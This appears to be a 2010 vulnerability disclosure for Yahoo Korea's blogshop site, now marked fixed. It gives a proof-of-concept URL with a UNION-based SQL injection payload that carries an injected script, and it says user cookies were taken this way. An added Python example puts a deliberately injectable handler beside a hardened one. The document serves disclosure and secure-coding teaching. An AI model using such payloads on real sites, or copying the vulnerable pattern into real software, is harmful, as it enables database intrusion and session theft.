Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed
Overview:
Yahoo Korea has Blog-shop, which is one of the most famous subdomains in Korea.
A cross-site scripting (XSS) vulnerability affects blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.
Exploit Description :
It has SQL injection in the notice_read.html?key script. I was successful in retrieving Yahoo users' cookies through this SQL injection by inserting JavaScript into the SQL injection payload.
POC (Proof Of Concept ):
http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16'/**/UNION/**/SELECT/**/1,2,3,4,@@version,%3Cscript%3Ealert('XSS HERE');</script>,7,8,9,0,1,2,3,4,5,6,7--%20
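The PoC above implies two missing controls: the key value reaches the SQL text without parameter binding, and the query result is written into the page without HTML encoding. The following is an added example, not code from this advisory or from Yahoo; the table schema, the function names and the use of Python with SQLite are assumptions, since the page does not show the server-side code. It puts that vulnerable pattern beside a hardened one.

```python
import html
import re
import sqlite3

# Constructed input modelled on the PoC above, shortened to three columns.
PAYLOAD = "-16' UNION SELECT 1, '<script>alert(1)</script>', 3 -- "
NOT_FOUND = "<p>not found</p>"


def make_db():
    """In-memory stand-in for the notice table (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notice (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO notice VALUES (16, 'Maintenance', 'Shop closed on Sunday')")
    return db


def render_vulnerable(db, key):
    # Defect 1: the request parameter is concatenated into the SQL text,
    # so a quote in it ends the literal and the rest is parsed as SQL.
    sql = "SELECT id, title, body FROM notice WHERE id = '" + key + "'"
    row = db.execute(sql).fetchone()
    if row is None:
        return NOT_FOUND
    # Defect 2: query results go into the page without HTML encoding.
    return "<h1>%s</h1><p>%s</p>" % (row[1], row[2])


def render_hardened(db, key):
    # Control 1: allow-list the parameter; a notice key is a short decimal id.
    if not re.fullmatch(r"[0-9]{1,9}", key):
        return NOT_FOUND
    # Control 2: bind the value, so it can never change the statement's shape.
    row = db.execute(
        "SELECT id, title, body FROM notice WHERE id = ?", (int(key),)
    ).fetchone()
    if row is None:
        return NOT_FOUND
    # Control 3: encode on output, which also covers markup already stored.
    return "<h1>%s</h1><p>%s</p>" % (
        html.escape(str(row[1])), html.escape(str(row[2])))


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(make_db(), PAYLOAD))
    print("hardened:  ", render_hardened(make_db(), PAYLOAD))
    print("hardened:  ", render_hardened(make_db(), "16"))
```

Binding alone stops the injected UNION, and output encoding alone stops script from running in the page; keeping both means a regression in one layer does not reopen the cookie-theft path described above.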
Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)
Regards
Sandeep Kamble